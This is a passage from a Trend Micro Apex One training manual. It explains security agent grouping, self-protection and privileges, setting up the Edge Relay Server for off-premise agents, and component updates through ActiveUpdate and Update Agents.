© 2019 Trend Micro Inc. Education 101


Lesson 4: Security Agents

Best Practice: Confusion can arise if settings are applied to many different endpoint computers at
the Agent level. It is recommended that a new domain be created to assign settings to
specific endpoints, instead of assigning them directly to the endpoints.

Agent Grouping
Agents in Apex One can be grouped to share the same configuration and run the same tasks. By
grouping Agents into groups (referred to in Officescan as domains), you can configure, manage, and
apply the same configuration to all domain members. There are two Agent grouping methods that can
be used: manual and automatic.

Manual Grouping
An Apex One Server uses this setting only during fresh Agent installations.

The installation program checks the network domain to which a target endpoint belongs. If the
domain name already exists in the Agent tree, Apex One groups the Agent on the target endpoint
under that domain and will apply the settings configured for the domain. If the domain name does
not exist, Apex One adds the domain to the Agent tree, groups the Agent under that domain, and
then applies the root settings to the domain and Agent.

Once the Agent appears in the Agent tree, it can be manually moved to another domain or to
another Apex One Server. Manual Agent grouping includes the creation, management, and removal
of domains in the Agent tree.

Manual Agent grouping defines the domain to which a newly installed Agent should belong, for
example NetBIOS domain, Active Directory domain or DNS domain.

Automatic Grouping
Automatic (or Custom) grouping uses rules to sort Agents in the Agent tree. Once the rules are in
place, Agents can be sorted manually or automatically into custom Agent groups when specific
events occur or at scheduled intervals.

102 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Automatic Agent grouping uses rules defined by IP addresses or Active Directory domains. If a rule
defines an IP address or an IP address range, the Apex One Server will group Agents with a matching
IP address to a specific domain in the Agent tree. Similarly, if a rule defines one or several Active
Directory domains, the Apex One Server will group Agents belonging to a particular Active Directory
domain to a specific domain in the Agent tree.

The Apex One Server groups Agents accordingly when the following events are triggered:
• The Agent registers to the Server for the first time
• The Agent connection status changes from offline to online
• The Agent IP address changes
• The Agent reloads

Grouping may also be done using the Sort Client command.

Note: If Agents match multiple rules during the grouping operation, the first matched rule will be
applied. If no rules are matched during the grouping operation, the Agents are placed into a
group called Default.

© 2019 Trend Micro Inc. Education 103


Lesson 4: Security Agents

Scheduled domain sorting and creation is disabled by default. Administrators can use the Scheduled
Domain Creation settings on Agent Grouping window to set the time and frequency for this task.

The sorting rule or automatic Agent grouping criteria are stored in:
...\PCCSRV\Private\SortingRuleStore\SortingRule.xml

Viewing Agent Status


Administrators can view the status of Agents from the Apex One Web Management console or directly
on the endpoint computer.

Viewing Agent Status on the Endpoint


An icon in the Windows System Tray display the status of the Security Agents and their connection
to the SmartScan Server.

104 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Some examples of the different status icons are displayed in the table below:

Connection with Apex Availability of Smart


Icon Real Time Scan
One Server Protection Source

Online Available Enabled

Unavailable/
Online Enabled
Reconnecting

Offline Available Enabled

Unavailable/
Offline Reconnecting Enabled

Online Available Service not running

Online Available Manually disabled

© 2019 Trend Micro Inc. Education 105


Lesson 4: Security Agents

Viewing Agent Status in the Web Management Console


Administrators can view the status of the Agent from the Agents list in the Web Management
Console.

Agent Self Protection


The protection that Apex One offers depends entirely on the ability of the Security Agent to implement
authentic Apex One Server settings. The Agent, therefore, must be protected from all unauthorized
attempts to change settings, which are all stored in the Windows Registry, and to disrupt its services.
Unauthorized Change Prevention is responsible for evaluating system access events like file I/O and
prevents unauthorized changes to registry keys and processes.

Security Agents maintain two layers of protection for its settings:


• Change prevention: This is a proactive defense measure. It is aimed at blocking unauthorized
changes from happening in the first place.
• Security Agent service restart: Apex One restarts Agent services that stopped responding
unexpectedly and were not stopped by a normal system process.

106 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Configuring Unauthorized Change Prevention


Apex One protects Agent components and settings using the Unauthorized Change Prevention
Service. This service is responsible for protecting Security Agents from changes other than those
made through either the Apex One Server or Agent consoles.

The service appears in the Windows Service Control. The service itself is responsible for evaluating
system access events (for example, file I/O, registry access, etc.) based on event-handling policies,
and then taking action upon these events in accordance with the relevant policies (for example,
prevent the change, block access, etc.)

When the options to protect registry keys and services are enabled in the Apex One Web
management console, the NT Real-time Scan mechanism passes the relevant policy information to
the Unauthorized Change Prevention Service, which then converts the information into policies that
it implements.

To configure the Security Agent Self-Protection, click Agent > Agent Management. Select the
appropriate domain, group or individual Agent from list and click Settings > Privileges and Other
Settings. Click the Other Settings tab,

• Protect Security Agent services: Apex One blocks all attempts to terminate the following
Security Agent services:
- Apex One NT Listener (TmListen.exe)
- Apex One NT RealTime Scan (NTRtScan.exe)
- Apex One NT Firewall (TmPfw.exe)
- Apex One Data Protection Service (dsAgent.exe)
- Trend Micro Unauthorized Change Prevention Service (TMBMSRV.exe)

Note: If this option is enabled, the Security Agent may prevent third-party products from installing
successfully on endpoints. If you encounter this issue, you can temporarily disable the option
and then re-enable it after the installation of the third-party product.

- Trend Micro Common Client Solution Framework (TmCCSF.exe)

© 2019 Trend Micro Inc. Education 107


Lesson 4: Security Agents

• Protect files in the Security Agent installation folder: To prevent other programs and even the
user from modifying or deleting Security Agent files, Apex One provides several enhanced
protection capabilities. After enabling Protect files in the Security Agent installation folder,
Apex One locks the following files in the root Agent installation folder:
- All digitally-signed files with .exe, .dll, and .sys extensions
- Some files without digital signatures, including:
- bspatch.exe
- bzip2.exe
- NETWH32.dll
- libcurl.dll
- libeay32.dll
- libMsgUtilExt.mt.dll
- msvcm80.dll
- MSVCP60.DLL
- msvcp80.dll
- msvcr80.dll
- OfceSCV.dll
- OFCESCVPack.exe
- patchbld.dll
- patchw32.dll
- patchw64.dll
- PiReg.exe
- ssleay32.dll
- Tmeng.dll
- TMNotify.dll
- zlibwapi.dll
After enabling Protect files in the Security Agent installation folder and Real-time Scan for virus/
malware threats, Apex One performs the following actions:
- File integrity checking before launching .exe files in the installation folder: During
ActiveUpdate updates, Apex One verifies that the issuer of the file triggering the update is
Trend Micro. If the issuer is not recognized as Trend Micro and ActiveUpdate cannot replace
the incorrect file, Apex One logs the incident in the Windows event logs and blocks the
update.
- Prevents DLL hijacking: Some malware writers copy dynamic link library files to the Security
Agent installation folder or the Behavior Monitoring folder with the purpose of loading these
files before the Agent loads. These files attempt to disrupt the protection offered by Apex
One. To prevent the copying of hijacked files to the Security Agent folders, Apex One
prevents the copying of files to the installation folder and Behavior Monitoring folder.

108 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

• Protect Security Agent registry keys: The Security Agent blocks all attempts to modify, delete,
or add new entries under the following registry keys and subkeys:
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\NSC
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Osprey
HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\AMSP
• Protect Security Agent processes: The Security Agent blocks all attempts to terminate the
following processes:
• TmListen.exe: Receives commands and notifications from the Apex One server and
facilitates communication from the Security Agent to the server
• NTRtScan.exe: Performs Real-time, Scheduled, and Manual Scan on Security Agents
• TmProxy.exe: Scans network traffic before passing it to the target application
• TmPfw.exe: Provides packet level firewall, network virus scanning, and intrusion detection
capabilities
• TMBMSRV.exe: Regulates access to external storage devices and prevents unauthorized
changes to registry keys and processes

Kernel Mode Termination Protection


NEW

Change Prevention blocks user mode termination events but there are some applications that could
potentially terminate processes through kernel mode. To address this issue, Apex One introduces a
new Watchdog mechanism for kernel mode termination events. This mechanism will attempt to
recover target processes after being terminated.

When the Security Agent is started, services will monitor processes on the endpoint. If the endpoint
receives a terminate event, it will call Watchdog which checks if the process is still alive. If the
process is not running, it will recover the service. Watchdog is dependent on Agent Self-Protection.
Ensure that Security Agent Self-Protection is enabled to use this feature.

Security Agent Service Restart


Apex One restarts Agent services that stopped responding unexpectedly and were not stopped by a
normal system process.

© 2019 Trend Micro Inc. Education 109


Lesson 4: Security Agents

To configure the necessary settings to enable Security Agent services to restart, go to Agents >
Global Agent Settings and on the System tab, go to the Services Restart section. Click Automatically
restart any Security Agent service if the service terminates unexpectedly.

• Restart the service after __ minutes: Specify the amount of time (in number of minutes) that
must elapse before Apex One restarts a service.
• If the first attempt to restart the service is unsuccessful, retry __ times: Specify the
maximum retry attempts for restarting a service. Manually restart a service if it remains
stopped after the maximum retry attempts.
• Reset the unsuccessful restart count after_ hour(s): If a service remains stopped after
exhausting the maximum retry attempts, Apex One waits a certain number of hours to reset
the failure count. If a service remains stopped after the number of hours elapses, Apex One
restarts the service.

Agent Privileges
Modify privileges to grant users the ability to modify certain settings and perform high level tasks on the
Security Agent. To grant privileges, click Agents > Agent Management. In the Agent tree, click the root
domain icon to include all Agents or select specific domains or Agents. Click Settings > Privileges and
Other Settings.

110 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Independent Mode Privileges


Independent mode privileges can be granted to certain users if Agent-Server events are interfering
with the users' tasks. For example, a user who frequently gives presentations can enable Independent
mode before starting a presentation to prevent the Apex One Server from deploying Security Agent
settings and initiating scans on the Security Agent.

© 2019 Trend Micro Inc. Education 111


Lesson 4: Security Agents

When Security Agents are in Independent mode:


• Security Agents do not send logs to the Apex One Server, even if there is a functional
connection between the Server and Agents.
• The Apex One Server does not initiate tasks and deploy Security Agent settings to the
Agents, even if there is functional connection between the Server and Agents.
• Security Agents update components if they can connect to any of their update sources.
Sources include the Apex One Server, Update Agents, or a custom update source.

The following events trigger an update on Independent Agents:


• The user performs a manual update.
• Automatic Agent update runs. You can disable automatic Agent update on Independent
Agents.
• Scheduled update runs. Only Agents with the required privileges can run scheduled updates.
You can revoke this privilege anytime.

112 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Scan Type Privileges


Allow users to configure their own Manual Scan, Real-time Scan and Scheduled Scan settings.

Firewall Privileges
Allow users to configure their own firewall settings. All user-configured settings cannot be
overridden by settings deployed from the Apex One Server. For example, if the user disables
Intrusion Detection System (IDS) and you enable IDS on the Apex One Server, IDS remains disabled
on the Security Agent endpoint.

© 2019 Trend Micro Inc. Education 113


Lesson 4: Security Agents

Behavior Monitoring Privileges


If Agents have the Behavior Monitoring privileges, the Behavior Monitoring option displays on the
Settings screen on the Security Agent console. Users can then manage their own exception list.

Trusted Program List Privilege


You can grant end users the privilege to configure Apex One to skip scanning of trusted processes
during Real-time and Behavior Monitoring scans. After adding a program to the Trusted Programs
List, Apex One does not subject the program or any processes initiated by the program to Real-time
Scan. Add trusted programs to the Trusted Program List to improve the performance of scanning on
endpoints.

114 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Mail Scan Privileges


When Security Agents have the mail scan privileges, the Mail Scan option displays on the Security
Agent console.

Proxy Configuration Privileges


This privilege allow users to configure proxy settings on the Security Agent console.

© 2019 Trend Micro Inc. Education 115


Lesson 4: Security Agents

Update Privileges
Configure update settings to grant Agent users privileges, such as performing an Update Now .

Agent Unloading and Unlocking Privilege


This privilege allows Security Agents to be unloaded by users without a password.

116 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Agent Uninstallation Privilege


This privilege allows uninstallation by users without a password.

© 2019 Trend Micro Inc. Education 117


Lesson 4: Security Agents

118 © 2019 Trend Micro Inc. Education


Lesson 5: Managing Off-Premise Agents

Lesson 5: Managing Off-Premise Agents

Lesson Objectives:

After completing this lesson, participants will be able to:


• Define the responsibilities of the Apex One Edge Relay Server
• Install the Apex One Edge Relay Server
• Register the Apex One Edge Relay Server with the Apex One Server

Off-premise management of Security Agents is made possible through the Apex One Edge Relay Server.
This allows administrative users to maintain visibility of roaming Agents (for example, traveling users)
even when they are not using a VPN to connect into their corporate network.

The Edge Relay Server acts as a reverse proxy between off-premise Agents and the Apex One Server
allowing these Agents to sync data with the Apex One Server. The architecture of the Edge Relay Server
in Apex One has been updated to forward all Agent requests to the Apex One Server, including
configuration and policy details. The location for the Edge Server can be anywhere (in the DMZ network,
cloud, etc.), as long as:
• It is publicly available to the Agent
• The Apex One Server can reach it

After configuring the Edge Relay Server, Security Agents receive settings and automatically report to
the Edge Relay Server once a connection to the Apex One Server is unavailable.

Communication between the Edge Relay Server, Apex One Server, and Security Agents is secured using
https encrypted communication.

One Apex One Edge Relay Server can support multiple Apex One Servers and its external Agents
however, an Apex One Server can register to ONLY one Apex One Edge Relay Server.

Note: Previous versions of the Edge Relay Server provided limited Security Agent protection features.
The version of the Edge Relay Server provided with Apex One now enables full Security Agent
capabilities to remote Agents, including configuration settings.

© 2019 Trend Micro Inc. Education 119


Lesson 5: Managing Off-Premise Agents

443

Apex One
Server

443 443

Apex One Apex One


Server Edge Relay Server

Remote
443 Security Agents

Apex One
Server

Edge Relay Server and External Agent


Communications
Security Agents will feedback data to the Apex One Edge Relay Server, provided that the following
conditions are met:
• Location is set to out of office
• The Agent has the Edge Relay Server information and certificate is in the Agent’s registry key.

Internal network DMZ

https https https https

Apex One Apex One


Server Edge Relay Server

Apex One IIS Rewrite Remote


ISAPI/
CGI
Master Module Security Agents
Service
Rewrite
Rules

The IIS Rewrite Module, installed as a component of the IIS Web Server on the Edge Relay Server, serves
as a reverse proxy to forward requests from Security Agents on the Internet to the Apex One Server on
the internal network. The IIS Rewrite Module will replace the Server and port details received from the
remote Agents with the Server and port details of the Apex One Server. The Edge Relay Server then
forwards the request to the URL of the Apex One Server.

120 © 2019 Trend Micro Inc. Education


Lesson 5: Managing Off-Premise Agents

Installing the Apex One Edge Relay Server


Before installing the Edge Relay Server, ensure that the target server computer meets the minimum
system requirements.

Resource Requirements
Processor 2GHz Dual Core
Memory 512 MB minimum
Disk space 110 MB
Operating system • Windows Server 2016
• Windows Server 2012 R2
Web Server Microsoft Internet Information Server (IIS)
Network card Network card configured to use different ports
for intranet and Internet connections
Database The version of the Edge Relay Server used with
Apex One no longer requires a database

Note: The Edge Relay Server does not require two separate network interfaces as the same network
interface can be used for internal and external communications as different ports are used
internally and externally. However, if required for other purposes, having two network interfaces
on the same machine as the Edge Relay Server is supported.

To install the Edge Relay Server, perform the following steps:


1 Locate the following folder on the Apex One Server computer, and copy the folder to the target
Edge Relay Server computer:
...\PCCSRV\Admin\Utility\EdgeServer
2 On the target Edge Relay Server, open the ...\EdgeServer folder and double-click
setup.exe to start the setup process.

© 2019 Trend Micro Inc. Education 121


Lesson 5: Managing Off-Premise Agents

3 The setup package checks the server for required components. If any of the required Windows
components do not exist on the server, click Install to allow the setup program to install the
missing components during the Edge Relay Server installation process.

4 The Welcome screen is displayed. Click Next.

5 Accept the default installation directory or click Change... to select a different location and click
Next.

122 © 2019 Trend Micro Inc. Education


Lesson 5: Managing Off-Premise Agents

6 Specify the following settings that off-premises Security Agents use to connect to the Edge
Relay Server and click Next:

• Fully qualified domain name (FQDN)


• Certificate
• IP address

Note: The Edge Relay Server does not support IPv6 communication.

• Port

Note: You must configure your firewall and gateway to allow redirection of the Security Agent
communication from the Internet to the Edge Relay Server and Communication through the port
specified

7 If no certificate is selected, an option to allow the setup to create a self-signed certificate is


displayed. Click Yes to allow the setup to generate a certificate.

© 2019 Trend Micro Inc. Education 123


Lesson 5: Managing Off-Premise Agents

8 Specify and confirm the password used for the Edge Relay Server certificate and click Next.

9 The Installation Information screen is displayed for review. Click Next to begin the setup.

10 The program files are installed.

124 © 2019 Trend Micro Inc. Education


Lesson 5: Managing Off-Premise Agents

11 Click Finish to complete the setup.

Registering the Edge Relay Server


After installing, you must use the Edge Relay Server Registration Tool to register the Edge Relay Server
with each Apex One Server that off-premises Security Agents report to. Security Agents reporting to the
Apex One Servers receive the registered connection settings and can automatically use the Edge Relay
Server to contact the Apex One Server after leaving the corporate intranet.

On the Edge Relay Server computer, open a Command Prompt and navigate the following folder:
C:\Program Files\Trend Micro\Apex One Edge Relay\OfcEdgeSvc

Type the following command to register the Edge Relay Server:


ofcedgecfg.exe --cmd reg --server <server address> --port <port> --pwd
<root password>

Where: <server address> is the Apex One Server IP address

<port> is the Apex One Server port number

<root password> is the Apex One Server root account password


For example: ofcedgecfg.exe --cmd reg --server 192.168.4.1 --port 4343 --pwd
trendmicro

To view the status of the connection between the Apex One Server and the Edge Relay Server after
registering, open the Apex One Web Management console and go to Administration > Settings > Edge
Relay.

© 2019 Trend Micro Inc. Education 125


Lesson 5: Managing Off-Premise Agents

To view other Edge Relay configuration commands, refer to the Edge Relay Server Registration Tool
section in the Apex One Administrator Guide.

126 © 2019 Trend Micro Inc. Education


Lesson 5: Managing Off-Premise Agents

Viewing Off-Premise Agents


To view Agents which recently connected to the Apex One Edge Relay Server, administrators can
click Off-premise Agent view from the Agent Management page.

Additionally, administrators can view off-premise Agents using the following Off-Premise widget. It
displays the history of the Agent connection status. Administrators also have the option to switch
the time range criteria to view by Last 7 days or Last 24 hours.

Apex One Relay Server Digital Certificates


Since the Apex One Edge Relay Server does not reside on the local network, certificates must be used to
secure the data exchange channel. The certificates needed include the following:

Certificate Name Certificate Path Comments


OSCE EDGE server - Trusted Root Edge Relay Server self-signed
OsceEdgeRoot
Certification Authority > Certificates certificate

OsceOPA OSCE Agent (off-premise) - OfcEdge > Agent-server communication


Certificates authenticated
Osceds OSCE EDGE data server - Personal > Encrypts data exchanged between
OfcsslAgent Certificates Agents and Edge Relay Server as well
OSCE EDGE server - Trusted People > as Edge Relay Server and Apex One
OsceDS Agent Server
Certificates

© 2019 Trend Micro Inc. Education 127


Lesson 5: Managing Off-Premise Agents

The certificate deployment process includes the following steps:


1 The OsceEdgeRoot certificate is generated after the installation of the Apex One Edge Relay
Server.
2 When the Apex One Server connects to Edge Relay Server, the OsceEdgeRoot certificate will
be deployed to Apex One Server.
3 When the Security Agent connects to Apex One Server, it will deploy this new certificate.
Once the Security Agent has this certificate, it can be communicate and send information to the
Apex One Edge Relay Server when required.

Note: The endpoint computer will only become aware of the Edge Relay Server after it has connected
to the Apex One Server at least once after the Edge Relay Server has been installed.

Renewing Edge Relay Server Certificate


The Edge Relay Server Registration Tool can also be used to manually import/renew the certificate
that is used to establish the Apex One Edge Relay Server connection. To renew the certificate,
execute the following command:
OfcEdgeCfg.exe --renewcert --certpwd <password>

Off-premises Security Agents must connect to the Apex One server to obtain the new Edge Relay
Server certificate. Any off-premises agents that do not receive the updated certificate can no longer
communicate with the Edge Relay Server until connection with the Apex One server is established.

128 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Lesson 6: Keeping Trend Micro Apex


One Up To Date

Lesson Objectives:

After completing this lesson, participants will be able to:


• Update the Apex One Server
• Update Security Agents
• Promote Security Agents to become Update Agents

When updates are available, the Apex One Server and Smart Protection sources (Smart Protection
Server or Smart Protection Network) download the updated components. There are no component
download overlaps between the Apex One Server and Smart Protection sources because each one
downloads a specific set of components.

You can configure both the Apex One Server and Smart Protection Server to update from a source other
than the Trend Micro ActiveUpdate Server. To do this, you need to set up a custom update source.

The Apex One Server downloads most of the components that Agents need. The only component it does
not download is the Smart Scan Pattern, which is downloaded by smart protection sources. If the Apex
One Server manages a large number of Agents, updating may utilize a significant amount of Server
computer resources, affecting the Server’s stability and performance. To address this issue, Apex One
has an Update Agent feature that allows certain Agents to share the task of distributing updates to
other Agents.

ActiveUpdate
Apex One uses Trend Micro ActiveUpdate to obtain and distribute updates for specific program
components. Two types of components can be updated:
• Patterns
• Engines

The ActiveUpdate (AU) module is Apex One’s interface to the ActiveUpdate system. As a Trend Micro
common module, this module is developed independently of other products.

ActiveUpdate Integrity
With increasing reports of Advanced Protection Threat (APT) attacks from different organizations,
ActiveUpdate was integrated into Apex One to prevent Man-in-the-Middle situations. In this scenario,
hackers can perform ARP Spoofing and mislead the Agent to retrieve updates from the malicious
source or attacker.

© 2019 Trend Micro Inc. Education 129


Lesson 6: Keeping Trend Micro Apex One Up To Date

Integrity of the ActiveUpdate package is verified through digital signatures. The Apex One Server
and Agents verify this signature on the update package before downloading the components. This
ensures that the components being downloaded have been provided by Trend Micro and have not
been tampered with.

To verify this feature, locate and open the ofcscan.ini file. In the [Global Setting] section, locate
EnforceAUSign=1.

Pattern Updates
Trend Micro releases two types of pattern updates:
• Official Pattern Release: Patterns are regularly made available to users as part of an Official
Pattern Release (OPR). Upon release, these patterns are posted on the ActiveUpdate system
once per day, where products can download using the default update source.
• Controlled Pattern File Release: These are pre-release version of a Trend Micro virus pattern
file. It is a fully tested pattern file intended to provide additional antivirus protection in
between official pattern file releases.

Incremental Updates
Incremental update technology limits the impact of updates on network bandwidth. This was
originally only available for virus pattern updates, but has now been applied to other patterns. It
does not, however, apply to engine updates.

For each new pattern on the Trend Micro update Server, there are several incremental patterns.
Each incremental pattern contains the difference between the malware signatures in the latest
version, and the version to which the increment corresponds.

Increments are provided for the 14 most recent Official Pattern Releases. If the pattern used in a
product is older than any of the 14 incremental patterns, then the latest full pattern is downloaded.

ActiveUpdate Logs
ActiveUpdate-related activities are recorded in two logs:
• TmuDump.txt: the ActiveUpdate module records its activities in this log
• Ofcdebug.log: Apex One services record their activities in this log, making it ideal for
studying calls from the product to the ActiveUpdate module

The ActiveUpdate module records all its actions in a log file called TmuDump.txt, making this file a
very important source of troubleshooting information when analyzing update-related problems. This
log can be written as a text file or as an HTML file, depending on settings in the ActiveUpdate
configuration file.

The log files can be located in the following folder:

...\PCCSRV\Web\AU_Data\AU_Log

130 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Updating the Apex One Server


Apex One Server components can be updated manually or by configuring an update schedule.

Manual Server Updates


When an update is critical, perform a manual update so the Apex One Server can obtain the updates
immediately. In the Web Management console, click Updates > Server > Manual Update.

© 2019 Trend Micro Inc. Education 131


Lesson 6: Keeping Trend Micro Apex One Up To Date

Scheduled Server Update


A scheduled update allows the Apex One Server to connect to the update source during the specified
day and time to obtain the latest components. In the Web Management console, click Updates >
Server > Scheduled Update.

Server Update Source


If the Apex One Server belongs to a network that is isolated completely from all outside sources, you
can keep the server’s components up-to-date by letting it update from an internal source that
contains the latest components. This source can also be used in situations where an organization
might want to control the release of new patterns, only allowing the patterns to be applied after
internal testing.

The update source, such as Apex Central or a random host machine must have a reliable Internet
connection so that it can download the latest components from the Trend Micro ActiveUpdate
server. Without an Internet connection, the only way for the update source to have the latest
components is to obtain the components yourself from Trend Micro and then copy them into the
update source. Configure proxy settings if there is a proxy server between the Apex One Server and
the update source and ensure that there is enough disk space for downloaded components. In the
Web Management console, click Updates > Server > Update Source.

132 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Updating Security Agents


To allow the Server to deploy the updated components to Agents, enable Automatic Agent update. If
automatic Agent update is disabled, the Server downloads the updates but does not deploy them to the
Agents.

Automatic Updates
Agent updates can run automatically when certain events occur or when scheduled. In addition to
components, Security Agents also receive updated configuration files during automatic update. In
the Web Management console, click Updates > Agents > Automatic Update

© 2019 Trend Micro Inc. Education 133


Lesson 6: Keeping Trend Micro Apex One Up To Date

Event-Triggered Updates

The Server can notify online Agents to update components after it downloads the latest
components, and offline Agents when they restart and then connect to the Server.

Schedule-based Updates

Security Agents with appropriate privileges will run updates based on the schedule.

Manual Updates
When an update is critical, use Manual Update to immediately notify Agents to perform a component
update. In addition to components, Security Agents also receive updated configuration files
automatically during a Manual Update. In the Web Management console, click Updates > Agents >
Manual Update.

134 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Privilege-based Updates
Users with update privileges have greater control over when the Security Agent on their computers
gets updated.

Agent Update Source


An alternate source for updates can be selected for specific Agents. In the Web Management
console, click Updates > Agents > Update Source.

© 2019 Trend Micro Inc. Education 135


Lesson 6: Keeping Trend Micro Apex One Up To Date

Update Agents
Update Agents are Security Agents that function as alternative update sites for other Agents within an
Apex One network. They permit the deployment of settings to Agents whose connections to the Apex
One Server would have been sufficient for regular Agent-Server messages but not for bandwidth-
intensive updates, including:
• Component updates
• Domain settings
• Agent programs and hot fixes

Update Agents serve as local ActiveUpdate sites. Like the Apex One Server, they offer both full and
incremental patterns to their Agents by way of its own ActiveUpdate folder.

Best Practice: Any Security Agent can be promoted to an Update Agent, but typically, it is
recommended that an Agent on an endpoint computer that remains on at all times be
used.

Without Update Agents, all endpoint computers contact the Apex One Server for updates. In installations
with many Security Agent, this can create network traffic issues.

Trend Micro Apex One


Update Server
Server

Security Agents

136 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

With Update Agents in place, endpoint computers will contact their Update Agents for updates instead of
contacting the Apex One Server. This reduces the amount of network traffic destined for the Apex One
Server. Security Agent are assigned Update Agents based on their IP addresses.

Trend Micro Apex One


Update Server
Server

Update Agents

Security Agents

Best Practice: Since a single update agent can handle update requests from around 250 endpoints, it
is recommended to create one update agent for every 250 endpoints. Do not promote
the Security Agent on an Apex One Server to become the Update Agent.

Promoting an Agent to an Update Agent


Promoting an Agent to an Update Agent is a two-step process:
1 Click Update Agent Settings from the right-mouse button menu on any Security Agent in the
Agents list. Select the options to be delivered by the Update Agent and click Save.

© 2019 Trend Micro Inc. Education 137


Lesson 6: Keeping Trend Micro Apex One Up To Date

2 Modify the update source for a range of IP addresses. Click Updates > Agents > Update Source.
Click Customized Update Source and Add. Identify an IP address range and select the Update
Source as the newly created Update Agent.

Update Components
Components that Update Agents make available to other Security Agents are stored in the
ActiveUpdate folder. This is essentially a copy of the download folder on the Apex One Server.

The components that the Update Agent itself uses, for its own purposes, are still stored in the main
Security Agent folder.

138 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

The default Update Agent downloads the following components when the Agent is promoted to
Update Agent status. The approximate size of a typical Update Agent and the elements it needs to
download to become an Update Agent is outlined here.

Items stored Location Approximate size


Scan engine and pattern file updateable \engine
components \pattern 70 MB

Domain settings \Safsaf.7z 75 MB*


\Apex One
Programs and hot fixes newpnt.zip 250 MB
newpx64.zip
Additional 200 MB

* Each domain with different settings increases about 9KB.

Promotion of an Agent to a default Update Agent transfers approximately 600MB of files to the
Security Agent. It is, however, able to provide incremental updates to its Agents immediately.

Downloading and Deploying Updates


ActiveUpdate is used on Apex One networks for both obtaining updates from an update source, and then
deploying them to Security Agents. The update process in an Apex One network can be broken down into
the following steps.
1 Apex One determines if updates are required
The process begins when Apex One Server uses its ActiveUpdate module to download a server
definition file (server.ini) from a pre-selected ActiveUpdate Server. The download could have
been initiated either manually, or by a scheduled update event.
Server.ini contains a list of the versions of components currently available on the
ActiveUpdate Server. ActiveUpdate compares the information in this file with the files on the
Apex One Server to determine if an update is necessary.

Note: The Apex One Master Service is responsible for calling the ActiveUpdate module.

2 Updates are downloaded


If the ActiveUpdate module determines that an update is required, it downloads the necessary
components from the ActiveUpdate Server. Afterwards, it updates its own server.ini file.
3 Update Agent notification and download
In response to an update request, the Apex One Server identifies Update Agents on its database.
Once identified, the Server sends a message to these Update Agents.
After notifying the Update Agents, the server waits (by default 15 minutes) for the Update Agents
to obtain their updates, and retries 5 times if no response has been received. This waiting period
is defined in ofcscan.ini by the Download_TimeOut_RA parameter under the
[INI_SERVER_SECTION] section.
You can also use the SvrTune.exe, located in the ...\PCCSRV\Admin\Utility\SvrTune
folder to change the settings.

© 2019 Trend Micro Inc. Education 139


Lesson 6: Keeping Trend Micro Apex One Up To Date

4 Agent notification
After completing the download, Apex One can do one of the following:
• Immediately deploy updates to its Agents (default)
• Store updates for use in either a manual update deployment, or an Agent-initiated update
At deployment time, Apex One notifies its Agents about the availability of new components,
thereby prompting Agents to use their respective ActiveUpdate modules to download the Apex
One server.ini file.
5 Agents determine if updates are required
Upon receipt of the update notification, the Security Agents perform the same update
verification done in Step 1. However in the Agent’s case, the update source is either the Apex One
Server itself, or an alternative update source.
6 Agents download updates
Agents download the increments or patterns as needed.
7 Agent notifies server it has the update
Agents notify their Apex One Server that they have been updated.

Security Compliance
Use Security Compliance in an on-premise environment to ensure that Agents have the latest services,
components, settings and have run recent scans. Security Compliance determines component
inconsistencies between the Apex One Server and Agents.

Security Compliance generates a Compliance Report to help you assess the security status of Security
Agents managed by the Apex One Server. Security Compliance generates the report on demand or
according to a schedule. In the Web Management console, click Assessment > Security Compliance >
Manual Report or Schedule Report.

Services
Security Compliance checks whether the following Security Agent services are functional:
• Antivirus
• Anti-spyware
• Firewall
• Web Reputation
• Behavior Monitoring/Device Control (also referred to as Trend Micro Unauthorized Change
Prevention Service)
• Data Protection
• Suspicious Connection

A non-compliant Agent is counted at least twice in the Compliance Report.


• In the Endpoints with Non-compliant Services category
• In the category for which the Security Agent is non-compliant. For example, if the Security
Agent’s Antivirus service is not functional, the Agent is counted in the Antivirus category. If
more than one service is not functional, the Agent is counted in each category for which it is
non-compliant.

140 © 2019 Trend Micro Inc. Education


Lesson 6: Keeping Trend Micro Apex One Up To Date

Restart non-functional services from the Web Management console or from the Security Agent. If
the services are functional after the restart, the Agent will no longer appear as non-compliant during
the next assessment.

Components
Security Compliance determines component version inconsistencies between the Apex One server
and Security Agents. Inconsistencies typically occur when Agents cannot connect to the Server to
update components. If the Agent obtains updates from another source (such as the Trend Micro
ActiveUpdate server), it is possible for the Agent component version to be newer than the version on
the server

A non-compliant Agent is counted at least twice in the Compliance Report.


• In the Endpoints with Inconsistent Component Versions category
• In the category for which the Agent is non-compliant. For example, if the Agent Smart Scan
Agent Pattern version is not consistent with the version on the Server, the Agent is counted
in the Smart Scan Agent Pattern category. If more than one component version is
inconsistent, the Agent is counted in each category for which it is non-compliant.

© 2019 Trend Micro Inc. Education 141


Lesson 6: Keeping Trend Micro Apex One Up To Date

To resolve component version inconsistencies, update outdated components on the Agents or


server.

Scan Compliance
Security Compliance checks if Scan Now or Scheduled Scans are run regularly and if these scans are
completed within a reasonable amount of time. Security Compliance can only report the Scheduled
Scan status if Scheduled Scan is enabled on Agents.

Security Compliance uses the following scan compliance criteria:


• No Scan Now or Scheduled Scan performed for the last (x) days: The Security Agent is non-
compliant if it did not run Scan Now or Scheduled Scan within the specified number of days.
• Scan Now or Scheduled Scan exceeded (x) hours: The Security Agent is non-compliant if the
